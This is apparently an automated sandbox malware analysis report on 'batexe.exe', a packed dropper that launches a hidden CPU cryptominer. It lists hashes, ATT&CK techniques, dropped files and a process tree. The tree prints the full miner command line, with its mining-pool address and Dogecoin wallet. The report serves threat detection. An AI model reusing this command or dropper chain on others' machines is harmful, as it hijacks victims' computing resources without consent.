73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
302s
platform
windows10-2004_x64
resource
win10v2004-20231222-ja
resource tags

arch:x64arch:x86image:win10v2004-20231222-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
20-02-2024 05:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
5256	b2e.exe
1356	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1356	cpuminer-sse2.exe
1356	cpuminer-sse2.exe
1356	cpuminer-sse2.exe
1356	cpuminer-sse2.exe
1356	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/5568-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 5568 wrote to memory of 5256	5568	batexe.exe	84
PID 5568 wrote to memory of 5256	5568	batexe.exe	84
PID 5568 wrote to memory of 5256	5568	batexe.exe	84
PID 5256 wrote to memory of 1408	5256	b2e.exe	85
PID 5256 wrote to memory of 1408	5256	b2e.exe	85
PID 5256 wrote to memory of 1408	5256	b2e.exe	85
PID 1408 wrote to memory of 1356	1408	cmd.exe	88
PID 1408 wrote to memory of 1356	1408	cmd.exe	88

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5568
- C:\Users\Admin\AppData\Local\Temp\5B5E.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\5B5E.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\5B5E.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5256
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5E6C.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1408
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1356

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5B5E.tmp\b2e.exe

Filesize
5.0MB

MD5
896293c4d54a79830044f728d9201214

SHA1
298b6789316f0d30dbc90fb7c8b9cfa8faac9e1f

SHA256
b9fb116772de5960694920f97f38e77cd4c9943269db934df7e9419247311834

SHA512
fe8729d3abe3476da5ea173ba9f50eddad1b387ef25eed69fef790a646d6fe0add5b7c1a15487e179cf0d5243c2bd86edddd4f63efcc30fb8aa1b977bf5e8a91

Download Submit
C:\Users\Admin\AppData\Local\Temp\5B5E.tmp\b2e.exe

Filesize
2.1MB

MD5
099e18cf84312ee05add20eaed01b2c0

SHA1
3aedb8f0362d50274ec7bf1e79bbd3923b47cc13

SHA256
8856beb3ce39073034ad1cd1b72251224cbe3b2861af9086947470096666312c

SHA512
70c26948eecb460a2c035d8bec9f100588244a0c621fe26c13826bef00464051b54e200abfd73cb07bbe76c6c807317dc90b4974a739be718e37aa2621c134ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\5B5E.tmp\b2e.exe

Filesize
2.1MB

MD5
9cbcf4e74c6102e88a4d43ce4d313cf3

SHA1
98f4a385fbe403b9317340c3de395dfd62c3c964

SHA256
cf879fa47e4f8f8443c406cba2375a1fb4bdaf2b539518137e412532d8a786da

SHA512
2a8796515e9140c1ba1c3e54ebf8f92d903c5d7c991ea801351d33c01a95fee09e0fc9b57edd04e2d1385ff48b232141fce5e1be8146a564adb9ea055c2a9f23

Download Submit
C:\Users\Admin\AppData\Local\Temp\5E6C.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.2MB

MD5
3b37e90ea4cced99f86e9e04f77e84ee

SHA1
c288261c49a802ea14e9446e3214cca759478153

SHA256
67c47a7c33baade2b907c91e5ece3207150417e952e1c5d2b4e150b242415bb3

SHA512
41da6cf9aa1a073ae943451565ce92563a175e28ee0c7966738c5e2246c534936d28d1c7d40e677c62f8e10b6dbcf9bff735ee3528badccba901f258841dedeb

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.6MB

MD5
08ab53eb9b84995a8efd2aa09a338071

SHA1
d85428dc9278e4847f0dd9b927044590949abc13

SHA256
b329b86c075387629f746cc6053842fdb075a5dc5091fec505c8ed5c04fd65dc

SHA512
143f2c89b170822a923d280f2ca1691ccf4d7cbf91419441f2e3e1739cb91fb1fb892557b7f9d82a51a035326586c8471dfcc0b0e5e6eec28b18842a1ffe0d08

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
48KB

MD5
187a23e1b2b2b77b15fcda9f361c6381

SHA1
657a24b799bfcf5a30d2cf0d54f445e8cc15baa7

SHA256
92d4a2a41836ecd7e5e37573c02d0b7de0efd2e2985c37cef50da42595371d5f

SHA512
f4a30c7aa500204fa99c62e463e642c9db3f414222d02dbac2d013b2b888be1771fffb824eb007aed085f4fc67dd6cef27720c6f28c9d0d75f6f4e26e0ce8306

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
57KB

MD5
9847e73bcb93a91acd165a0f6892b3f6

SHA1
1015d74d21104498e7155841b9e7cd8f66a983c5

SHA256
e324d252f54abb2a57eb723ff7e77015f545af2544a54b9bcacfe2a20ec4abe4

SHA512
f2047bd1599c42d543bd698bd0e6f1df718648169ec08c9a47403b69c5d88a2cdeb388138fafdfa38a4ecbd6f0f54e209357967a3987221351bd44860169f88d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
51KB

MD5
958d45a07401ec2022317bdf7a68697c

SHA1
98c4bb8b069ec3df3917be86156c57a9cde29e98

SHA256
ac92bb56e9723d9322c4a69e380e804169e9e6fd166ddd5fc69650aa286193d3

SHA512
7e2a0956c1b5b5b95f2c3f682514018baf0e807e914804b0c034c32453ed721cd6e7a9753955c3c949edc70fd6c498fe0831806609dd974dbdaf5c3c44e06a6c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
57KB

MD5
4a91d8f522a86a4a67e44a7667410a6f

SHA1
7ecf2598d4da2b1b105991b2f5a49c8e14e648a4

SHA256
4ecdc95a5d1aac157a46642018b8ed1f005ee2ab6e9ab2bf8f38e961dc37ea4c

SHA512
aa5a94d3acb4c310f0b24d132556ff07ec17bc152e4575c7e3e3d89babc9768ac0be323f3ed89c796d145b28f19a7d8d880721077b4e503a2aa3b8990032f9e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.4MB

MD5
b801289b6b99dffe0cc8f698295c5ae2

SHA1
c4634f2c3d80423a6e27722932886e478d48b7e5

SHA256
6e245916e589e7f0e1d4196817dfde19f285f6cfa1b6e7088ff8eebdeb651f83

SHA512
173424332c97035277e2c4aa5f91675e5c28693a2cb61b8c495f1dd53162f66e61ac3a006790245dea27bb72710cbc08c0a7410500c9ddae8071d5fbde9c4160

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
14KB

MD5
5c37dcf3e37dbc99177c5bcf977be61c

SHA1
44b8d5a15e30792b04ebbcd38b18779b66b5c07e

SHA256
29d05cc85bfba5e047fa07d67fd4832259ed2cd8e651e1d0719d6d1fe4ab1c5c

SHA512
7653829956b1e040b59d78d1b8d3efae81a65c906be1a5538d0ec6167af3fce5f0cfeaa506290d3ab23d192ff971a408c5b4a74736c83ba3ee9e6faa6b611d7d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
1KB

MD5
d7c75b973084fc64536bef84775773ef

SHA1
4ba97a231c651cf0bb9f21c833d0e15d2c1057d3

SHA256
de7e877c905b61a5c6c6d5a60040ee125a9222cc4dabc1398393785bcdb82983

SHA512
e8c5afaa40f10c983ec4470ca3ebfcddd9d5ef4dcc61a4dee165ddfb63d878f9a9e56f74a447feb9337fa332fd94f057ec6de16622b030764aa78137e8a5a808

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
14KB

MD5
86c2fb7846e808c73956d2954bd051f8

SHA1
1b54332402200a6e8448ad712f5f11c28fb6c0e2

SHA256
ffccd3f566dc0dcd44bc6bf74977baf565b08a4ff741a952d1a3e91a02627c16

SHA512
73fc2576f47b9eeaabb7577f50a2172f6f6ae5c9348616bba6dcc1f37d279c529c974380d653f8b1d8d99d0f37e07af59ad2ebb91e975b15e38bef228845b1c8

Download Submit
memory/1356-45-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1356-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1356-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1356-46-0x0000000064990000-0x0000000064A28000-memory.dmp

Filesize
608KB

Download
memory/1356-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1356-44-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1356-47-0x00000000010D0000-0x0000000002985000-memory.dmp

Filesize
24.7MB

Download
memory/1356-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1356-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1356-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1356-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1356-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1356-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1356-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5256-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5256-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5568-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download